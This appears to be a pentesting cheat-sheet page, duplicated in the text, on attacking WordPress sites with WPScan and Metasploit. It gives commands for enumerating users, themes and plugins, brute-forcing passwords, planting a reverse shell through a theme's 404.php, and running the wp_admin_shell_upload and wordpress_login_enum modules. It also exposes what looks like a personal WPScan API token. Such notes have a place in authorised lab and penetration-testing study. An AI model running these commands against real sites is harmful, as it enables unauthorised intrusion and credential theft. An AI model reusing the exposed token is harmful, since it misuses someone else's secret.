WPScan

https://www.kali.org/tools/wpscan/

wpscan -h #List WPscan Parameters
wpscan --update #Update WPscan

#Enumerate WordPress using WPscan


wpscan --url "http://<TARGET_IP>" -e t #All Themes Installed

wpscan --url "http://<TARGET_IP>" -e vt #Vulnerable Themes Installed

wpscan --url "http://<TARGET_IP>"  -e p #All Plugins Installed

wpscan --url "http://<TARGET_IP>"  -e vp #Vulnerable Themes Installed

wpscan --url "http://<TARGET_IP>"  -e u #WordPress Users

wpscan --url "http://<TARGET_IP>"  --passwords path-to-wordlist #Brute Force WordPress Passwords

#Upload Reverse Shell to WordPress
http://<IP>/wordpress/wp-content/themes/twentyfifteen/404.php

#Upload using Metasploit
msf > use exploit/unix/webapp/wp_admin_shell_upload
msf exploit(wp_admin_shell_upload) > set USERNAME admin
msf exploit(wp_admin_shell_upload) > set PASSWORD admin
msf exploit(wp_admin_shell_upload) > set targeturi /wordpress
msf exploit(wp_admin_shell_upload) > exploit

#User Enumeration
wpscan --url https://example/ --enumerate u

#Bruteforce
wpscan --url https://example/ --passwords wordlist.txt --usernames samson

Enumerate and hack a web app using wpscan and metasploit

— enumerate u: Specify the enumeration of users
Mine: hWt9qrMZFm7MKprTWcjdasowoQZ7yMccyPg8lsb8ads
service postgresql start
msfconsole
use auxiliary/scanner/http/wordpress_login_enum
show options
set PASS_FILE password.txt
set RHOST 10.10.10.16
set RPORT 8080
set USERNAME admin
run
Find the credential

Additional Resources

PreviousWireshark or Tcpdump NextZap

Last updated 1 year ago

WPScan

https://www.kali.org/tools/wpscan/

wpscan -h #List WPscan Parameters
wpscan --update #Update WPscan

#Enumerate WordPress using WPscan


wpscan --url "http://<TARGET_IP>" -e t #All Themes Installed

wpscan --url "http://<TARGET_IP>" -e vt #Vulnerable Themes Installed

wpscan --url "http://<TARGET_IP>"  -e p #All Plugins Installed

wpscan --url "http://<TARGET_IP>"  -e vp #Vulnerable Themes Installed

wpscan --url "http://<TARGET_IP>"  -e u #WordPress Users

wpscan --url "http://<TARGET_IP>"  --passwords path-to-wordlist #Brute Force WordPress Passwords

#Upload Reverse Shell to WordPress
http://<IP>/wordpress/wp-content/themes/twentyfifteen/404.php

#Upload using Metasploit
msf > use exploit/unix/webapp/wp_admin_shell_upload
msf exploit(wp_admin_shell_upload) > set USERNAME admin
msf exploit(wp_admin_shell_upload) > set PASSWORD admin
msf exploit(wp_admin_shell_upload) > set targeturi /wordpress
msf exploit(wp_admin_shell_upload) > exploit

#User Enumeration
wpscan --url https://example/ --enumerate u

#Bruteforce
wpscan --url https://example/ --passwords wordlist.txt --usernames samson

Enumerate and hack a web app using wpscan and metasploit

wpscan — api-token hWt9qrMZFm7MKprTWcjdasowoQZ7yMccyPg8lsb8ads — url — plugins-detection aggressive — enumerate u
— enumerate u: Specify the enumeration of users
API Token: Register at
Mine: hWt9qrMZFm7MKprTWcjdasowoQZ7yMccyPg8lsb8ads
service postgresql start
msfconsole
use auxiliary/scanner/http/wordpress_login_enum
show options
set PASS_FILE password.txt
set RHOST 10.10.10.16
set RPORT 8080
set TARGETURI
set USERNAME admin
run
Find the credential

wpscan | Kali Linux ToolsKali Linux

Additional Resources

WPScan Intro: How to Scan for WordPress VulnerabilitiesSucuri Blog

How to hack a WordPress website with WPScanHacking Tutorials

How to use WPScan to easily find your wordpress site vulnerabilities

Checking the Password Strength of WordPress Users with WPScanWP White Security

PreviousWireshark or Tcpdump NextZap

Last updated 1 year ago